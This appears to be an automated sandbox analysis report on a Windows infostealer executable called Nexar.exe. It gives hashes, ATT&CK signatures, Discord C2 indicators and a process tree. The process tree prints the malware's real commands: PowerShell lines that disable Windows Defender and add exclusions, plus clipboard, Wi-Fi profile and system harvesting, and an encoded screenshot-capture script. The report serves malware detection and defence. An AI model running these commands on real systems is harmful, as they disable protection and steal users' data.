4ef68e3dc9748d50c7df66349d324ab972cb313645492c192809648e1e563737

Analysis

max time kernel
440s
max time network
442s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
07-11-2024 21:45

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Nexar.exe
Size

7.6MB
MD5

e79f13238418281f91b9060e58020bac
SHA1

bef9b4abb0e779c1a8519f731e2433156372f2ba
SHA256

4ef68e3dc9748d50c7df66349d324ab972cb313645492c192809648e1e563737
SHA512

d77dbeb4c6c65c5667bcb5699f8e4389b66f9e21be125266c516c08277f5664211c3ee7ad18dc0d92dd78b67011eb226e95d54ca69d8d4e1ca9e1ddeb9c890b3
SSDEEP

196608:iIgVVE9GwfI9jUC2gYBYv3vbW2+iITx1U6n4:GVVE9tIH2gYBgDWJTnz4

Score

8^/10

collection credential_access defense_evasion discovery execution persistence privilege_escalation spyware stealer upx

Malware Config

Signatures

Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
700	powershell.exe
700	powershell.exe
780	powershell.exe
1340	powershell.exe

Drops file in Drivers directory 3 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\drivers\etc\hosts	attrib.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	Nexar.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	attrib.exe

Clipboard Data 1 TTPs 2 IoCs

Adversaries may collect data stored in the clipboard from users copying information within or between applications.

collection

Clipboard Data

T1115

pid	Process
1820	cmd.exe
1672	powershell.exe

Executes dropped EXE 1 IoCs

pid	Process
1528	rar.exe

Loads dropped DLL 17 IoCs

pid	Process
4448	Nexar.exe
4448	Nexar.exe
4448	Nexar.exe
4448	Nexar.exe
4448	Nexar.exe
4448	Nexar.exe
4448	Nexar.exe
4448	Nexar.exe
4448	Nexar.exe
4448	Nexar.exe
4448	Nexar.exe
4448	Nexar.exe
4448	Nexar.exe
4448	Nexar.exe
4448	Nexar.exe
4448	Nexar.exe
4448	Nexar.exe

Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
credential_access stealer

Credentials In Files
T1552.001
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
21	discord.com
22	discord.com

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
19	ip-api.com

Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
defense_evasion

Command Obfuscation
T1027.010

Enumerates processes with tasklist 1 TTPs 4 IoCs

discovery

Process Discovery

T1057

pid	Process
5100	tasklist.exe
1656	tasklist.exe
1740	tasklist.exe
732	tasklist.exe

UPX packed file 57 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/files/0x000a000000023b89-21.dat	upx
behavioral2/memory/4448-25-0x00007FFB68080000-0x00007FFB68745000-memory.dmp	upx
behavioral2/files/0x000a000000023b7c-28.dat	upx
behavioral2/files/0x000a000000023b8d-39.dat	upx
behavioral2/files/0x000a000000023b83-48.dat	upx
behavioral2/files/0x000a000000023b82-47.dat	upx
behavioral2/files/0x000a000000023b81-46.dat	upx
behavioral2/files/0x000a000000023b80-45.dat	upx
behavioral2/files/0x000a000000023b7f-44.dat	upx
behavioral2/files/0x000a000000023b7e-43.dat	upx
behavioral2/files/0x000a000000023b7d-42.dat	upx
behavioral2/files/0x000c000000023b7a-41.dat	upx
behavioral2/files/0x000a000000023b8f-40.dat	upx
behavioral2/files/0x000a000000023b88-35.dat	upx
behavioral2/files/0x000a000000023b86-34.dat	upx
behavioral2/memory/4448-32-0x00007FFB7B980000-0x00007FFB7B98F000-memory.dmp	upx
behavioral2/memory/4448-31-0x00007FFB7B990000-0x00007FFB7B9B5000-memory.dmp	upx
behavioral2/files/0x000a000000023b87-30.dat	upx
behavioral2/files/0x000a000000023b8c-38.dat	upx
behavioral2/memory/4448-54-0x00007FFB78A00000-0x00007FFB78A2D000-memory.dmp	upx
behavioral2/memory/4448-58-0x00007FFB78320000-0x00007FFB78344000-memory.dmp	upx
behavioral2/memory/4448-56-0x00007FFB78910000-0x00007FFB7892A000-memory.dmp	upx
behavioral2/memory/4448-60-0x00007FFB67D50000-0x00007FFB67ECF000-memory.dmp	upx
behavioral2/memory/4448-62-0x00007FFB779B0000-0x00007FFB779C9000-memory.dmp	upx
behavioral2/memory/4448-66-0x00007FFB71A00000-0x00007FFB71A33000-memory.dmp	upx
behavioral2/memory/4448-65-0x00007FFB78610000-0x00007FFB7861D000-memory.dmp	upx
behavioral2/memory/4448-70-0x00007FFB68080000-0x00007FFB68745000-memory.dmp	upx
behavioral2/memory/4448-74-0x00007FFB67C80000-0x00007FFB67D4E000-memory.dmp	upx
behavioral2/memory/4448-73-0x00007FFB7B990000-0x00007FFB7B9B5000-memory.dmp	upx
behavioral2/memory/4448-78-0x00007FFB78030000-0x00007FFB7803D000-memory.dmp	upx
behavioral2/memory/4448-81-0x00007FFB672B0000-0x00007FFB673CA000-memory.dmp	upx
behavioral2/memory/4448-80-0x00007FFB78A00000-0x00007FFB78A2D000-memory.dmp	upx
behavioral2/memory/4448-76-0x00007FFB777E0000-0x00007FFB777F4000-memory.dmp	upx
behavioral2/memory/4448-71-0x00007FFB67740000-0x00007FFB67C73000-memory.dmp	upx
behavioral2/memory/4448-94-0x00007FFB78320000-0x00007FFB78344000-memory.dmp	upx
behavioral2/memory/4448-112-0x00007FFB67D50000-0x00007FFB67ECF000-memory.dmp	upx
behavioral2/memory/4448-283-0x00007FFB71A00000-0x00007FFB71A33000-memory.dmp	upx
behavioral2/memory/4448-284-0x00007FFB67740000-0x00007FFB67C73000-memory.dmp	upx
behavioral2/memory/4448-287-0x00007FFB67C80000-0x00007FFB67D4E000-memory.dmp	upx
behavioral2/memory/4448-303-0x00007FFB68080000-0x00007FFB68745000-memory.dmp	upx
behavioral2/memory/4448-309-0x00007FFB67D50000-0x00007FFB67ECF000-memory.dmp	upx
behavioral2/memory/4448-304-0x00007FFB7B990000-0x00007FFB7B9B5000-memory.dmp	upx
behavioral2/memory/4448-362-0x00007FFB67C80000-0x00007FFB67D4E000-memory.dmp	upx
behavioral2/memory/4448-363-0x00007FFB67740000-0x00007FFB67C73000-memory.dmp	upx
behavioral2/memory/4448-361-0x00007FFB78610000-0x00007FFB7861D000-memory.dmp	upx
behavioral2/memory/4448-360-0x00007FFB779B0000-0x00007FFB779C9000-memory.dmp	upx
behavioral2/memory/4448-359-0x00007FFB67D50000-0x00007FFB67ECF000-memory.dmp	upx
behavioral2/memory/4448-358-0x00007FFB78320000-0x00007FFB78344000-memory.dmp	upx
behavioral2/memory/4448-357-0x00007FFB78910000-0x00007FFB7892A000-memory.dmp	upx
behavioral2/memory/4448-356-0x00007FFB78A00000-0x00007FFB78A2D000-memory.dmp	upx
behavioral2/memory/4448-355-0x00007FFB7B990000-0x00007FFB7B9B5000-memory.dmp	upx
behavioral2/memory/4448-354-0x00007FFB7B980000-0x00007FFB7B98F000-memory.dmp	upx
behavioral2/memory/4448-353-0x00007FFB71A00000-0x00007FFB71A33000-memory.dmp	upx
behavioral2/memory/4448-352-0x00007FFB672B0000-0x00007FFB673CA000-memory.dmp	upx
behavioral2/memory/4448-351-0x00007FFB78030000-0x00007FFB7803D000-memory.dmp	upx
behavioral2/memory/4448-350-0x00007FFB777E0000-0x00007FFB777F4000-memory.dmp	upx
behavioral2/memory/4448-338-0x00007FFB68080000-0x00007FFB68745000-memory.dmp	upx

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

persistence privilege_escalation

Netsh Helper DLL

T1546.007

description	ioc	Process
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe

System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs

Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.

discovery

Wi-Fi Discovery

T1016.002

pid	Process
780	cmd.exe
3724	netsh.exe

Detects videocard installed 1 TTPs 1 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

pid	Process
2452	WMIC.exe

Gathers system information 1 TTPs 1 IoCs

Runs systeminfo.exe.

System Information Discovery

T1082

pid	Process
3292	systeminfo.exe

Suspicious behavior: EnumeratesProcesses 20 IoCs

pid	Process
1340	powershell.exe
1340	powershell.exe
700	powershell.exe
700	powershell.exe
1672	powershell.exe
1672	powershell.exe
1672	powershell.exe
2440	powershell.exe
2440	powershell.exe
2440	powershell.exe
700	powershell.exe
700	powershell.exe
700	powershell.exe
1884	powershell.exe
1884	powershell.exe
1884	powershell.exe
780	powershell.exe
780	powershell.exe
4736	powershell.exe
4736	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	1340	powershell.exe
Token: SeDebugPrivilege	700	powershell.exe
Token: SeDebugPrivilege	5100	tasklist.exe
Token: SeDebugPrivilege	1656	tasklist.exe
Token: SeDebugPrivilege	1672	powershell.exe
Token: SeIncreaseQuotaPrivilege	3684	WMIC.exe
Token: SeSecurityPrivilege	3684	WMIC.exe
Token: SeTakeOwnershipPrivilege	3684	WMIC.exe
Token: SeLoadDriverPrivilege	3684	WMIC.exe
Token: SeSystemProfilePrivilege	3684	WMIC.exe
Token: SeSystemtimePrivilege	3684	WMIC.exe
Token: SeProfSingleProcessPrivilege	3684	WMIC.exe
Token: SeIncBasePriorityPrivilege	3684	WMIC.exe
Token: SeCreatePagefilePrivilege	3684	WMIC.exe
Token: SeBackupPrivilege	3684	WMIC.exe
Token: SeRestorePrivilege	3684	WMIC.exe
Token: SeShutdownPrivilege	3684	WMIC.exe
Token: SeDebugPrivilege	3684	WMIC.exe
Token: SeSystemEnvironmentPrivilege	3684	WMIC.exe
Token: SeRemoteShutdownPrivilege	3684	WMIC.exe
Token: SeUndockPrivilege	3684	WMIC.exe
Token: SeManageVolumePrivilege	3684	WMIC.exe
Token: 33	3684	WMIC.exe
Token: 34	3684	WMIC.exe
Token: 35	3684	WMIC.exe
Token: 36	3684	WMIC.exe
Token: SeDebugPrivilege	1740	tasklist.exe
Token: SeIncreaseQuotaPrivilege	3684	WMIC.exe
Token: SeSecurityPrivilege	3684	WMIC.exe
Token: SeTakeOwnershipPrivilege	3684	WMIC.exe
Token: SeLoadDriverPrivilege	3684	WMIC.exe
Token: SeSystemProfilePrivilege	3684	WMIC.exe
Token: SeSystemtimePrivilege	3684	WMIC.exe
Token: SeProfSingleProcessPrivilege	3684	WMIC.exe
Token: SeIncBasePriorityPrivilege	3684	WMIC.exe
Token: SeCreatePagefilePrivilege	3684	WMIC.exe
Token: SeBackupPrivilege	3684	WMIC.exe
Token: SeRestorePrivilege	3684	WMIC.exe
Token: SeShutdownPrivilege	3684	WMIC.exe
Token: SeDebugPrivilege	3684	WMIC.exe
Token: SeSystemEnvironmentPrivilege	3684	WMIC.exe
Token: SeRemoteShutdownPrivilege	3684	WMIC.exe
Token: SeUndockPrivilege	3684	WMIC.exe
Token: SeManageVolumePrivilege	3684	WMIC.exe
Token: 33	3684	WMIC.exe
Token: 34	3684	WMIC.exe
Token: 35	3684	WMIC.exe
Token: 36	3684	WMIC.exe
Token: SeDebugPrivilege	2440	powershell.exe
Token: SeDebugPrivilege	732	tasklist.exe
Token: SeDebugPrivilege	700	powershell.exe
Token: SeDebugPrivilege	1884	powershell.exe
Token: SeIncreaseQuotaPrivilege	2084	WMIC.exe
Token: SeSecurityPrivilege	2084	WMIC.exe
Token: SeTakeOwnershipPrivilege	2084	WMIC.exe
Token: SeLoadDriverPrivilege	2084	WMIC.exe
Token: SeSystemProfilePrivilege	2084	WMIC.exe
Token: SeSystemtimePrivilege	2084	WMIC.exe
Token: SeProfSingleProcessPrivilege	2084	WMIC.exe
Token: SeIncBasePriorityPrivilege	2084	WMIC.exe
Token: SeCreatePagefilePrivilege	2084	WMIC.exe
Token: SeBackupPrivilege	2084	WMIC.exe
Token: SeRestorePrivilege	2084	WMIC.exe
Token: SeShutdownPrivilege	2084	WMIC.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2228 wrote to memory of 4448	2228	Nexar.exe	85
PID 2228 wrote to memory of 4448	2228	Nexar.exe	85
PID 4448 wrote to memory of 2360	4448	Nexar.exe	87
PID 4448 wrote to memory of 2360	4448	Nexar.exe	87
PID 4448 wrote to memory of 4076	4448	Nexar.exe	88
PID 4448 wrote to memory of 4076	4448	Nexar.exe	88
PID 4076 wrote to memory of 1340	4076	cmd.exe	91
PID 4076 wrote to memory of 1340	4076	cmd.exe	91
PID 2360 wrote to memory of 700	2360	cmd.exe	92
PID 2360 wrote to memory of 700	2360	cmd.exe	92
PID 4448 wrote to memory of 3672	4448	Nexar.exe	93
PID 4448 wrote to memory of 3672	4448	Nexar.exe	93
PID 4448 wrote to memory of 2364	4448	Nexar.exe	94
PID 4448 wrote to memory of 2364	4448	Nexar.exe	94
PID 2364 wrote to memory of 1656	2364	cmd.exe	97
PID 2364 wrote to memory of 1656	2364	cmd.exe	97
PID 3672 wrote to memory of 5100	3672	cmd.exe	98
PID 3672 wrote to memory of 5100	3672	cmd.exe	98
PID 4448 wrote to memory of 1820	4448	Nexar.exe	99
PID 4448 wrote to memory of 1820	4448	Nexar.exe	99
PID 4448 wrote to memory of 1388	4448	Nexar.exe	102
PID 4448 wrote to memory of 1388	4448	Nexar.exe	102
PID 4448 wrote to memory of 5016	4448	Nexar.exe	101
PID 4448 wrote to memory of 5016	4448	Nexar.exe	101
PID 4448 wrote to memory of 1224	4448	Nexar.exe	100
PID 4448 wrote to memory of 1224	4448	Nexar.exe	100
PID 4448 wrote to memory of 780	4448	Nexar.exe	104
PID 4448 wrote to memory of 780	4448	Nexar.exe	104
PID 4448 wrote to memory of 3456	4448	Nexar.exe	106
PID 4448 wrote to memory of 3456	4448	Nexar.exe	106
PID 4448 wrote to memory of 1432	4448	Nexar.exe	157
PID 4448 wrote to memory of 1432	4448	Nexar.exe	157
PID 4448 wrote to memory of 5020	4448	Nexar.exe	108
PID 4448 wrote to memory of 5020	4448	Nexar.exe	108
PID 1820 wrote to memory of 1672	1820	cmd.exe	116
PID 1820 wrote to memory of 1672	1820	cmd.exe	116
PID 3456 wrote to memory of 3292	3456	cmd.exe	117
PID 3456 wrote to memory of 3292	3456	cmd.exe	117
PID 1224 wrote to memory of 3684	1224	cmd.exe	118
PID 1224 wrote to memory of 3684	1224	cmd.exe	118
PID 1432 wrote to memory of 4044	1432	cmd.exe	119
PID 1432 wrote to memory of 4044	1432	cmd.exe	119
PID 5016 wrote to memory of 1740	5016	cmd.exe	120
PID 5016 wrote to memory of 1740	5016	cmd.exe	120
PID 1388 wrote to memory of 3096	1388	cmd.exe	121
PID 1388 wrote to memory of 3096	1388	cmd.exe	121
PID 780 wrote to memory of 3724	780	cmd.exe	122
PID 780 wrote to memory of 3724	780	cmd.exe	122
PID 5020 wrote to memory of 2440	5020	cmd.exe	123
PID 5020 wrote to memory of 2440	5020	cmd.exe	123
PID 4448 wrote to memory of 4324	4448	Nexar.exe	124
PID 4448 wrote to memory of 4324	4448	Nexar.exe	124
PID 4448 wrote to memory of 4936	4448	Nexar.exe	126
PID 4448 wrote to memory of 4936	4448	Nexar.exe	126
PID 4324 wrote to memory of 628	4324	cmd.exe	128
PID 4324 wrote to memory of 628	4324	cmd.exe	128
PID 4936 wrote to memory of 2104	4936	cmd.exe	129
PID 4936 wrote to memory of 2104	4936	cmd.exe	129
PID 4448 wrote to memory of 2756	4448	Nexar.exe	130
PID 4448 wrote to memory of 2756	4448	Nexar.exe	130
PID 4448 wrote to memory of 2956	4448	Nexar.exe	132
PID 4448 wrote to memory of 2956	4448	Nexar.exe	132
PID 2756 wrote to memory of 3992	2756	cmd.exe	134
PID 2756 wrote to memory of 3992	2756	cmd.exe	134

Views/modifies file attributes 1 TTPs 2 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
3360	attrib.exe
628	attrib.exe

C:\Users\Admin\AppData\Local\Temp\Nexar.exe
"C:\Users\Admin\AppData\Local\Temp\Nexar.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:2228
- C:\Users\Admin\AppData\Local\Temp\Nexar.exe
  "C:\Users\Admin\AppData\Local\Temp\Nexar.exe"
  2⤵
  - Drops file in Drivers directory
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID:4448
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Nexar.exe'"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2360
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Nexar.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:700
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4076
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1340
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3672
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      Suspicious use of AdjustPrivilegeToken
      PID:5100
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2364
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      Suspicious use of AdjustPrivilegeToken
      PID:1656
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
    3⤵
    - Clipboard Data
    - Suspicious use of WriteProcessMemory
    PID:1820
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      Clipboard Data
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1672
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1224
  - - C:\Windows\System32\Wbem\WMIC.exe
      WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:3684
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:5016
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      Suspicious use of AdjustPrivilegeToken
      PID:1740
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1388
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:3096
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
    3⤵
    - System Network Configuration Discovery: Wi-Fi Discovery
    - Suspicious use of WriteProcessMemory
    PID:780
  - - C:\Windows\system32\netsh.exe
      netsh wlan show profile
      4⤵
      Event Triggered Execution: Netsh Helper DLL
      System Network Configuration Discovery: Wi-Fi Discovery
      PID:3724
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "systeminfo"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3456
  - - C:\Windows\system32\systeminfo.exe
      systeminfo
      4⤵
      Gathers system information
      PID:3292
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1432
  - - C:\Windows\system32\reg.exe
      REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath
      4⤵
      PID:4044
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:5020
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
